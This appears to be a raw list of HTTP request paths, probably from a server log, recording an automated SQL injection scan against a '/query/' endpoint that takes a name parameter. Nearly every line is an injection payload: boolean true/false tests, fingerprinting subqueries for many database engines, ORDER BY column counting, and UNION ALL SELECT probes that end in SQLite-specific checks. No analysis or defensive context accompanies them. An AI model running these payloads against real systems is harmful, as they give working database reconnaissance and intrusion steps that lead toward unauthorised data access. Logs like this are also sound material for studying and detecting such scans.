/query/John
/query/John
/query/2005
/query/John.,('"(((,)
/query/John'ffyenR<'">kXJwlQ
/query/John) AND 8438=7839 AND (1986=1986
/query/John) AND 1733=1733 AND (6504=6504
/query/John AND 2669=4647
/query/John AND 1733=1733
/query/John') AND 8320=4814 AND ('EBeG'='EBeG
/query/John') AND 1733=1733 AND ('kpcD'='kpcD
/query/John' AND 6270=3225 AND 'hfBh'='hfBh
/query/John' AND 1733=1733 AND 'AhBl'='AhBl
/query/John' AND 4160=7765 AND 'UTBn'='UTBn
/query/John' AND (SELECT CVAR(NULL) FROM MSysAccessObjects) IS NULL AND 'wNeo'='wNeo
/query/John' AND (SELECT TDESENCRYPT(NULL,NULL)) IS NULL AND 'ORiJ'='ORiJ
/query/John' AND (SELECT %SQLUPPER NULL) IS NULL AND 'kMnX'='kMnX
/query/John' AND (SELECT MD5(NULL~NULL)) IS NULL AND 'ZWnF'='ZWnF
/query/John' AND (SELECT (NULL SETEQ NULL)) IS NULL AND 'mKdX'='mKdX
/query/John' AND (SELECT CHR(113)||CHR(77)||CHR(119)||CHR(65) FROM SYSIBM.SYSDUMMY1)='qMwA' AND 'Vhue'='Vhue
/query/John' AND (SELECT NULLIF(USER,SESSION_USER) FROM SYSIBM.SYSDUMMY1) IS NULL AND 'uLQd'='uLQd
/query/John' AND (SELECT NULLIFZERO(hashcode(NULL))) IS NULL AND 'CSVL'='CSVL
/query/John' AND (SELECT 'ZkRG' FROM RDB$DATABASE)='ZkRG' AND 'KHwU'='KHwU
/query/John' AND (SELECT 'GZHB' FROM INFORMATION_SCHEMA.IO_STATISTICS)='GZHB' AND 'fRoQ'='fRoQ
/query/John' AND (SELECT STRINGTOUTF8(NULL)) IS NULL AND 'rqrh'='rqrh
/query/John' AND (SELECT CHAR(98)||CHAR(114)||CHAR(81)||CHAR(98) FROM INFORMATION_SCHEMA.SYSTEM_USERS)='brQb' AND 'GYuU'='GYuU
/query/John' AND (SELECT 'iDOR' FROM SYSMASTER:SYSDUAL)='iDOR' AND 'NKnv'='NKnv
/query/John' AND (SELECT ALPHA(NULL) FROM VERSIONS) IS NULL AND 'fccl'='fccl
/query/John' AND (SELECT TONUMBER(NULL)) IS NULL AND 'fQMm'='fQMm
/query/John' AND (SELECT ASCII_CHAR(256) FROM SYSTEM.ONEROW) IS NULL AND 'Xiqp'='Xiqp
/query/John' AND (SELECT CODE(NULL)) IS NULL AND 'dfHX'='dfHX
/query/John' AND (SELECT DIFFERENCE(NULL,NULL)) IS NULL AND 'aAbB'='aAbB
/query/John' AND (SELECT QUARTER(NULL)) IS NULL AND 'RSby'='RSby
/query/John' AND (SELECT INSTR2(NULL,NULL) FROM DUAL) IS NULL AND 'uEWh'='uEWh
/query/John' AND (SELECT QUOTE_IDENT(NULL)) IS NULL AND 'AmBf'='AmBf
/query/John' AND (SELECT FROM_HEX(NULL)) IS NULL AND 'EwRx'='EwRx
/query/John' AND (SELECT IF(ROWNUMBER()>0,CONVERT(NULL,TINYINT),NULL))) IS NULL AND 'YyZY'='YyZY
/query/John' AND (SELECT UNLIKELY(NULL)) IS NULL AND 'jeqG'='jeqG
/query/John' AND (SELECT CHAR(90,73,104,75))='iXoS' AND 'nvrb'='nvrb
/query/(SELECT CONCAT(CONCAT('qpzqq',(CASE WHEN (9443=9443) THEN '1' ELSE '0' END)),'qzzjq'))
/query/SELECT CHAR(113,112,122,113,113)||(CASE WHEN (1312=1312) THEN 1 ELSE 0 END)||CHAR(113,122,122,106,113)
/query/John' ORDER BY 1-- FdNJ
/query/John' ORDER BY 6482-- qfNU
/query/John' ORDER BY 10-- ccAt
/query/John' ORDER BY 6-- ZhXu
/query/John' ORDER BY 4-- GrBj
/query/John' ORDER BY 3-- nann
/query/John' ORDER BY 2-- WBfm
/query/John' UNION ALL SELECT CHAR(113,112,122,113,113)||CHAR(105,106,112,68,108,75,89,120,78,108,82,103,107,101,108,72,85,103,73,72,103,117,82,101,79,75,99,74,84,100,103,65,70,98,121,101,118,69,98,102)||CHAR(113,122,122,106,113)-- eyyx
/query/John' UNION ALL SELECT CHAR(113,112,122,113,113)||CHAR(77,80,89,98,89,73,102,89,114,104)||CHAR(113,122,122,106,113)-- OyoP
/query/-9991' UNION ALL SELECT CHAR(113,112,122,113,113)||CHAR(79,83,119,101,114,85,115,90,118,108,65,106,97,111,71,72,87,101,72,109,84,74,73,86,77,109,86,86,100,105,97,100,116,99,67,110,85,68,120,77)||CHAR(113,122,122,106,113)-- hWJc
/query/-8280' UNION ALL SELECT CONCAT(CONCAT('qpzqq',(CASE WHEN (8325=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                8325) THEN '1' ELSE '0' END)),'qzzjq')-- jeqW
/query/-9690' UNION ALL SELECT CHAR(113,112,122,113,113)||(SELECT (CASE WHEN (LAST_INSERT_ROWID()=LAST_INSERT_ROWID()) THEN 1 ELSE 0 END))||CHAR(113,122,122,106,113)-- JMWE
/query/-8930' UNION ALL SELECT CHAR(113,112,122,113,113)||(SELECT (CASE WHEN (SQLITE_VERSION()=SQLITE_VERSION()) THEN 1 ELSE 0 END))||CHAR(113,122,122,106,113)-- hLVv
/query/-4441' UNION ALL SELECT CHAR(113,112,122,113,113)||(SELECT (CASE WHEN (RANDOMBLOB(-1)>0) THEN 1 ELSE 0 END))||CHAR(113,122,122,106,113)-- nxYa
